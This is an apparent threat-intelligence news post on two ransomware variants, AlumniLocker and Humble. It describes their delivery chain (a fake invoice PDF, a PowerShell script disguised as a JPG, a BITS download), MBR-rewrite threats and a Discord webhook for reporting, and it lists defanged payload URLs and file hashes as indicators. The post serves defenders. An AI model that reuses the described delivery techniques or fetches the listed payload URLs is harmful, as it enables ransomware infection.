ransomware attack

New Ransomware AlumniLocker and Humble

Researchers recently discovered two new ransomware variants: AlumniLocker and Humble.AlumniLocker is a variant of the Thanos ransomware series, which spreads through PDF files that fake the subject of invoices.

alumnilocker

The file contains a malicious download link. Once clicked, a ZIP file containing the malicious download program will be downloaded. The ZIP file contains a PowerShell script that is faked as a JPG file, which uses the Background Intelligent Service Transfer (BITS) module to download and execute the AlumniLocker payload. The AlumniLocker payload is a Microsoft Intermediate Language (MSIL) executable file packaged by Themida. Once AlumniLocker encrypts the victim’s files, it will display the ransom note through the notepad: a ransom of 10 bitcoins is required.

clip_image002

Humble ransomware was compiled with Bat2Exe, and found two variants that landed in different forms. One variant threatens that the master boot record (MBR) will be rewritten after the victim restarts the system; the other variant threatens the victim not to pay the ransom within five days and the MBR will be rewritten.

Humble uses the webhook service of the communication platform Discord to report to its or publishes the victim’s infection report; prevents explorer.exe from viewing or accessing local storage drives; uses extd.exe for file encryption; uses certutil.exe to manage certificates. Generate keys from random input; encrypt 104 file types. The also displays a ransom note set as the user’s locked screen image, warning the victim not to restart the system.

clip_image003

IOCs

AlumniLocker
hxxps://femto.pw/7unw 
hxxps://femto.pw/cyp5
hxxps://www.minpic.de/k/bgk5/fsqz7
hxxps://www.minpic.de/k/bgk6/17lim/


c6fde70f07d7879e028290e0d726fd35
45af7c4ed9f584df589f34738f74f145
e4cfcd59b69b4234969ae29c26448cd3
3d0e9b1ccce6ecc7d946cbbb237b89c10dadf225
46f65a6742bccca94098c09f27cc983d12c62c26
7af957009d14bf092e42f495a372f15dbb7e084a
10c252d04e0eb8a91688919a57f27193f0567cf45c8cafdd27577314bf7db704
57fafcf93acfc6c45a05ef60207226e21e83f538f2e6ea8077f67c907cdce729
dd61a8b804059891d5f25b39c1dcd5e880088e217ba30aa80ba2c9dbd35d060d
e97c6e05b1a3d287151638ffe86229597b188f9aa6d34db255f08dbc11dbfbd8


Humble
a4ab820409b4a2dc28f7c8d431a1f902
015bb16ddcbf8a6326ec859020466c05
1f02cb745dc400e8f29589b5a50e91a8
8e5a7171f1be0254dad65bfd78646f34
f040239f22c2d4bfa97d53eb4a73e98d0105eb6c
f0ff1059e64175c8bf3f557cf1b0f49ed105d7d4
2e8d8629352682d37479c6d0e87b9f8ec1a0819f
7a207db4d2a447a3c547fda5f34d3f6efda5dcf9
6be8927f5d508259c8100d363b42215d7c90845b1c6716a71414a6abbd0df230
c1eb88cc7f7b43de1ef71fae416c729483d71fa930314c36dfb03b01b8455d31
5f42b161717463991122f88dd7dba95a26bdd3d8c9ed21c316ba7a51e7270f66
dd10602b2500fac1f816c54d698c55ebe6a9e208b909bdafc074ccdb2d82a725